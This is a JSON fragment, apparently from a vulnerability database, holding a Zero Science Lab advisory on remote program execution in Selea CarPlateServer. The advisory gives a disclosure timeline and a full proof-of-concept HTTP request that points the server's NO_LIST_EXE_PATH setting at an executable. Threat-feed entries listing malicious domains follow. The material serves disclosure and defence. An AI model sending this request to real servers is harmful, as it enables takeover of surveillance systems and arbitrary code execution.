contacted. \n[09.11.2020] Vendor responds asking for explanation. \n[09.11.2020] Asked vendor for security personnel and explained about security submissions and risk/impact. \n[10.11.2020] Vendor responds asking for details. \n[11.11.2020] Sent details to the vendor (high-level, asked for PGP). \n[14.11.2020] Asked vendor for status update. \n[18.11.2020] Vendor responds: We already reviewed and fixed most of the vulnerabilities you described in newer version of both camera firmware and the CarPlateServer software. \n[19.11.2020] Replied to the vendor. \n[20.11.2020] Vendor will get back to us. \n[06.12.2020] Asked vendor for status update. \n[09.12.2020] Vendor in final test phase for new releases. Estimated release date: End of year. \n[09.12.2020] Replied to the vendor. \n[17.01.2021] Asked vendor for status update. \n[20.01.2021] No response from the vendor. \n[21.01.2021] Public security advisory released. \n\n##### PoC\n\n[selea_csp_rce.txt](<../../codes/selea_csp_rce.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - &lt;[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)&gt;\n\n##### References\n\nN/A \n\n##### Changelog\n\n[21.01.2021] - Initial release \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 2, "published": "2021-01-21T00:00:00", "title": "Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-21T00:00:00", "id": "ZSL-2021-5622", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php", "sourceData": "\r\nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The server suffers from an arbitrary win32/64 binary executable execution\r\nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command\r\nwill be executed if proper trigger criteria is met. It can be exploited via CSRF\r\nor by navigating to /cps/ endpoint from the camera IP and bypass authentication\r\ngaining the ability to modify the running configuration including changing the\r\npassword of admin and other users.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5622\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nPOST /config_request?ACTION=WRITE HTTP/1.1\r\nHost: localhost:8080\r\nConnection: keep-alive\r\nContent-Length: 6309\r\nAuthorization: Basic ZmFrZTpmYWtl\r\nAccept: application/json, text/plain, */*\r\nLoginMode: angular\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75\r\nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a\r\ncontent-type: application/json\r\nOrigin: http://localhost:8080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost:8080/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n\r\n{\r\n \"ACTIONS\": {\r\n \"ANIA_LIST_DAYS_NUM\": \"15\",\r\n \"ANIA_LIST_PWD\": \"\",\r\n \"ANIA_LIST_USER\": \"{B64valuehereommited}\",\r\n \"BLACK_LIST_COUNTRY\": \"\",\r\n \"EXACT_MATCH\": \"false\",\r\n \"FUZZY_MATCH\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\",\r\n \"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\",\r\n \"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_PWD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USER\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\",\r\n \"MINISTERO_LIST_DAYS_NUM\": \"24\",\r\n \"MINISTERO_LIST_PWD\": \"\",\r\n \"MINISTERO_LIST_USER\": \"\",\r\n \"NO_LIST_ENABLED\": \"true\",\r\n \"NO_LIST_ENABLE_EXE\": \"true\",\r\n \"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\",\r\n \"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\",\r\n \"NO_LIST_HTTP_ENABLED\": \"false\",\r\n \"NO_LIST_SEND_TCP_ALARM\": \"\",\r\n \"PERMISSIVE_MATCH\": \"true\",\r\n \"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\"\r\n },\r\n \"CAMERAINFO\": {\r\n \"BA__________\": {\r\n \"APPROACHING\": \"\",\r\n \"CustomCameraId\": \"\",\r\n \"CustomGateId\": \"\",\r\n \"DetectDesc\": \"ZSL\",\r\n \"DetectId\": \"\",\r\n \"Direction\": \"\",\r\n \"GPSLocation\": \"\",\r\n \"GateDesc\": \"3\",\r\n \"GateId\": \"\",\r\n \"LEAVING\": \"\",\r\n \"ZoneName\": \"\",\r\n \"setname\": \"false\",\r\n \"skip\": \"false\"\r\n }\r\n },\r\n \"CONTEXT\": {\r\n \"BA__________\": {\r\n \"URL\": [\r\n \"https://www.zeroscience.mk\"\r\n ]\r\n }\r\n },\r\n \"DBMS\": {\r\n \"DB_NAME\": \"\",\r\n \"DB_PASSWORD\": \"\",\r\n \"DB_SERVER\": \"\",\r\n \"DB_TYPE\": \"sqlite\",\r\n \"DB_USERNAME\": \"\",\r\n \"ENCRYPT_DB\": \"false\",\r\n \"SQLITE_MAX_MB_RAM_CACHE\": \"-1\"\r\n },\r\n \"EMAIL\": {\r\n \"DEST\": \"\",\r\n \"FROM_EMAIL\": \"\",\r\n \"FROM_NAME\": \"\",\r\n \"LOG_USER_SEARCH\": \"false\",\r\n \"MIN_EMAIL_TIME\": \"5\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"25\",\r\n \"SEND_EMAIL_ON_TAMPER\": \"false\",\r\n \"SERVER\": \"\",\r\n \"SSL\": \"false\",\r\n \"USERNAME\": \"\",\r\n \"XOAUTH2\": \"false\"\r\n },\r\n \"EMAIL-XOAUTH2\": {\r\n \"refresh_token\": \"\"\r\n },\r\n \"EZ_CLIENTS\": {\r\n \"PASSWORD\": \"\",\r\n \"SLAVES\": \"\",\r\n \"USERNAME\": \"\",\r\n \"USE_CNTLM\": \"false\",\r\n \"WANT_CTX\": \"false\"\r\n },\r\n \"EZ_CLIENT_SCNTT\": {\r\n \"CTX\": \"true\",\r\n \"HOST\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"443\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"FTPSYNC\": {\r\n \"DELETE_OLD_SYNC_DAYS\": \"7\",\r\n \"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\",\r\n \"SAVE_FTP_SEND_ERRORS\": \"true\"\r\n },\r\n \"GLOBAL_HTTP_PROXY\": {\r\n \"CNTLM_ENABLED\": \"false\",\r\n \"EZ_ADDRESS\": \"cps.selea.com\",\r\n \"EZ_PORT\": \"8999\",\r\n \"HOST\": \"\",\r\n \"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"PROXY_ENABLED\": \"true\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"HTTPS\": {\r\n \"CERTIFICATE\": \"\",\r\n \"ENABLE_HTTP2\": \"true\",\r\n \"GET_CERTIFICATE_FROM_SELEA\": \"false\",\r\n \"PRIVATE_KEY\": \"\",\r\n \"ROOT_CERTIFICATE\": \"\"\r\n },\r\n \"MASTER_CPS\": {\r\n \"ENABLED\": \"true\",\r\n \"MASTERS\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"PROXY_TCP\": {\r\n \"ENABLED\": \"false\",\r\n \"USE_HTTP_PROXY\": \"false\"\r\n },\r\n \"REMOTE_LIST\": {\r\n \"ADDRESS\": \"\",\r\n \"ENABLED\": \"false\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"REPORT\": {\r\n \"STATS_AGGREGATE\": \"true\",\r\n \"STATS_ENABLED\": \"false\",\r\n \"STATS_FREQ\": \"MONTH\",\r\n \"STATS_PATH\": \"\",\r\n \"STATS_SELECTED\": \"\",\r\n \"STATS_WEEK_DAY\": \"Mon\"\r\n },\r\n \"SCNTT\": {\r\n \"LIST_A1_DAYS_LIMIT\": \"0\",\r\n \"SCNTT_PASSWORD\": \"\",\r\n \"SCNTT_PRIV_KEY_FILENAME\": \"\",\r\n \"SCNTT_PUB_CERT\": \"\",\r\n \"SCNTT_SYSTEM_DESC\": \"\",\r\n \"SCNTT_SYSTEM_ID\": \"\",\r\n \"SCNTT_USERNAME\": \"\"\r\n },\r\n \"SETTINGS\": {\r\n \"ALLOW_FLASH_NOTIFICATIONS\": \"true\",\r\n \"AUTO_UPDATE\": \"true\",\r\n \"BACKUP_AT_SPECIFIC_HOUR\": \"-1\",\r\n \"BACKUP_DB_PATH\": \"\",\r\n \"BACKUP_EVERY_HOURS\": \"0\",\r\n \"CARPLATE_DETAILS_ENABLED\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\",\r\n \"CHECK_FILENAME_SYNTAX\": \"true\",\r\n \"DB_DELETE_DAYS\": \"90\",\r\n \"DB_DELETE_ENABLE\": \"false\",\r\n \"DB_DELETE_LOG_DAYS\": \"7\",\r\n \"DB_DELETE_OCR_FILE\": \"90\",\r\n \"DB_STATS_DELETE_DAYS\": \"90\",\r\n \"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\",\r\n \"ENCRYPT_IMAGES\": \"false\",\r\n \"FREE_DISK_LIMIT\": \"1000\",\r\n \"FRIENDLY_NAME\": \"test\",\r\n \"FTP_CUSTOM_PORT_RANGE\": \"false\",\r\n \"FTP_DOWNLOAD_DISABLED\": \"true\",\r\n \"FTP_ENABLED\": \"true\",\r\n \"FTP_EXTERN_IP\": \"\",\r\n \"FTP_EXTERN_IP_AUTO\": \"false\",\r\n \"FTP_LIST_DIR_DISABLED\": \"true\",\r\n \"FTP_MAX_PORT\": \"0\",\r\n \"FTP_MIN_PORT\": \"0\",\r\n \"FTP_PORT\": \"21\",\r\n \"FTP_USERS\": \"\",\r\n \"FTP_USE_FTPS\": \"true\",\r\n \"HTTP2_PORT\": \"8081\",\r\n \"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\",\r\n \"HTTP_PORT\": \"8080\",\r\n \"HTTP_USERNAME\": \"admin\",\r\n \"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\",\r\n \"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\",\r\n \"MILESTONE_CONNECTIONS\": \"5\",\r\n \"MILESTONE_ENABLED\": \"true\",\r\n \"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\",\r\n \"MILESTONE_PORT\": \"5666\",\r\n \"MILESTON_REMOTE_IP\": \"\",\r\n \"MILESTON_REMOTE_PORT\": \"8080\",\r\n \"MIN_LOG_LEVEL\": \"0\",\r\n \"PERIODIC_BACKUP_CONFIG\": \"0\",\r\n \"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\",\r\n \"REMOVE_NON_ALARM_CARPLATE\": \"false\",\r\n \"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\",\r\n \"SERVER_NTP_ON\": \"false\",\r\n \"SERVER_NTP_PORT\": \"123\",\r\n \"USE_HTTPS\": \"false\"\r\n },\r\n \"VPNC\": {\r\n \"VPN_NET_NAME\": \"\"\r\n },\r\n \"TCP_TEMPLATES\": []\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/selea_csp_rce.txt"}], "rst": [{"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **867383-dot-n-e-w-me-ss-age-po-rt-al[.]wl.r.appspot.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **9**.\n First seen: 2020-10-01T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 146[.]112.61.108\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-10-01T00:00:00", "id": "RST:324C5FA3-022A-3022-8AF9-57F74F552633", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 867383-dot-n-e-w-me-ss-age-po-rt-al.wl.r.appspot.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **88[.]wjx88.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **9**.\n First seen: 2020-08-04T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 47[.]91.169.15 and CNAME records: overdue.aliyun.com.\nWhois:\n Created: 2017-08-16 11:20:51, \n Registrar: Alibaba Cloud Computing Beijing Co Ltd, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-04T00:00:00", "id": "RST:98A1C8A3-0320-3397-844B-8B12D9E9CB80", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 88.wjx88.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9-23[.]dedicado.com.uy** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 201[.]221.23.9\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:1E3C5A0B-7D02-389F-BC8F-37E83FB083D2", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 9-23.dedicado.com.uy", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9-187-231-201[.]fibertel.com.ar** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 201[.]231.187.9\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:06107CE8-D814-39EE-AAFF-891775733A8B", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 9-187-231-201.fibertel.com.ar", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9[.]cclastnews.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 104[.]18.61.173,104.18.60.173,172.67.181.112\nWhois:\n Created: 2019-04-28 16:37:37, \n Registrar: REGISTRAR OF DOMAIN NAMES REGRU LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:0FCAF7D8-66B4-3F84-8D65-A4114564212F", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 9.cclastnews.com", "type": "rst", "cvss": {}}]}